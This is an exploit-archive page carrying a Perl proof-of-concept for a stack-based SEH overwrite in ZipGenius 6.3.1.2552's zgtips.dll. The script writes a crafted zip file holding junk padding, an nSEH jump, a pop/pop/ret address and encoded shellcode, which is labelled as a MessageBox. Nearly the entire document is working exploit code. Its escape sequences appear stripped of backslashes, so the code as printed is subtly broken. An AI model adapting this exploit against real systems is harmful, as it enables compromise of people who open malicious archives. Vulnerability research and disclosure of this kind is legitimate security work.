ZipGenius zgtips.dll Stack Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ZipGenius zgtips.dll Stack Buffer Overflow
# Published : 2010-04-21
# Author : corelanc0d3r
# Previous Title : EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC
# Next Title : ASX to MP3 Converter v3.1.2.1 Local Buffer Overflow (SEH)
# Exploit Title : ZipGenius zgtips.dll Stack Buffer Overflow
# Corelan       : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-029
# Date          : April 21st, 2010
# Author        : corelanc0d3r, mr_me and rick2600
# Bug found by  : rick2600
# Software Link : http://www.zipgenius.com/
# Version       : v6.3.1.2552
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH overwrite
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
print "|------------------------------------------------------------------|n";
print "|                         __               __                      |n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n";
print "|                                                                  |n";
print "|                                       http://www.corelan.be:8800 |n";
print "|                                                                  |n";
print "|-------------------------------------------------[ EIP Hunters ]--|n";
print " [+] Exploit for ZipGenius v6.3.1.2552n";
print " [+] Preparing payload...n";

my $filename="zipgenius.zip";

my $ldf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .# file size: don't change
"x00x00x00";

my $cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f". # file size: don't change
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $eofcdf_header = "x50x4Bx05x06x00x00x00x00x01x00x01x00".
"x12x10x00x00". # 
"x02x10x00x00". # 
"x00x00";

# Corelan Team MessageBox 
my $shellcode =
"x89xe5xdbxd3xd9x75xf4x5dx55x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x49x49x4ax4bx4fx6bx4ax79x51x64" .
"x51x34x49x64x45x61x48x52x4dx62x50x7ax44x71" .
"x4bx79x45x34x4ex6bx44x31x46x50x4ex6bx44x36" .
"x46x6cx4ex6bx50x76x47x6cx4ex6bx51x56x46x68" .
"x4ex6bx51x6ex45x70x4ex6bx44x76x45x68x42x6f" .
"x44x58x44x35x49x63x43x69x45x51x4bx61x49x6f" .
"x4dx31x45x30x4ex6bx50x6cx45x74x47x54x4cx4b" .
"x43x75x47x4cx4cx4bx46x34x45x55x44x38x47x71" .
"x49x7ax4cx4bx42x6ax47x68x4ex6bx50x5ax45x70" .
"x43x31x4ax4bx4bx53x50x37x42x69x4cx4bx46x54" .
"x4cx4bx43x31x48x6ex50x31x49x6fx45x61x49x50" .
"x49x6cx4ex4cx4fx74x4fx30x50x74x44x4ax4ax61" .
"x48x4fx46x6dx43x31x4fx37x4bx59x4ax51x4bx4f" .
"x4bx4fx49x6fx45x6bx51x6cx46x44x44x68x44x35" .
"x49x4ex4ex6bx42x7ax51x34x43x31x4ax4bx45x36" .
"x4ex6bx44x4cx42x6bx4cx4bx50x5ax47x6cx43x31" .
"x48x6bx4ex6bx46x64x4ex6bx47x71x4ax48x4fx79" .
"x50x44x46x44x45x4cx50x61x4ax63x4fx42x46x68" .
"x45x79x4ax74x4fx79x4dx35x4bx39x4bx72x42x48" .
"x4cx4ex42x6ex46x6ex48x6cx43x62x4dx38x4fx6c" .
"x4bx4fx4bx4fx49x6fx4dx59x42x65x44x44x4fx4b" .
"x51x6ex49x48x4bx52x50x73x4ex67x45x4cx46x44" .
"x50x52x4bx58x4ex6bx49x6fx49x6fx4bx4fx4ex69" .
"x42x65x44x48x50x68x50x6cx42x4cx45x70x49x6f" .
"x45x38x44x73x46x52x46x4ex50x64x51x78x42x55" .
"x50x73x51x75x42x52x4cx48x51x4cx47x54x47x7a" .
"x4fx79x4bx56x42x76x4bx4fx42x75x43x34x4cx49" .
"x49x52x42x70x4fx4bx4ex48x4ex42x50x4dx4dx6c" .
"x4fx77x45x4cx51x34x50x52x4ax48x51x4ex4bx4f" .
"x4bx4fx4bx4fx45x38x42x78x45x70x47x50x45x70" .
"x51x78x46x34x42x45x51x71x42x4dx45x38x42x4c" .
"x50x61x50x6ex45x70x43x58x50x43x50x6fx42x52" .
"x43x55x46x51x4bx6bx4fx78x51x4cx45x74x44x4c" .
"x4cx49x49x73x43x58x46x38x47x50x45x70x47x50" .
"x43x58x44x34x43x59x42x4fx50x6ex51x78x43x48" .
"x50x65x43x53x51x65x45x38x50x64x45x35x45x70" .
"x50x45x50x68x50x6fx47x50x47x33x50x6fx43x58" .
"x50x6cx45x35x51x30x43x44x51x78x42x45x50x72" .
"x45x31x50x62x43x58x50x56x44x35x42x4cx42x4e" .
"x45x61x49x59x4dx58x42x6cx51x34x45x4cx4bx39" .
"x48x61x50x31x4bx62x43x62x51x43x46x31x46x32" .
"x49x6fx4ex30x46x51x4bx70x42x70x49x6fx42x75" .
"x46x68x44x4ax41x41";



# --- payload ---
my $size=4064;
my $junk = "A" x 1060;
my $nseh="xEBx06x90x90";
my $seh=pack("V", 0x0295131C); # p/p/r UNIVERSAL
my $payload = $junk.$nseh.$seh.$shellcode;
my $rest = "D" x ($size - length($payload));
$payload = $payload . $rest. ".txt";    


print "Size : " . length($payload)."n";
print "Removing old $filename filen";
system("del $filename");
print "Creating new $filename filen";
open(FILE, ">$filename");
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);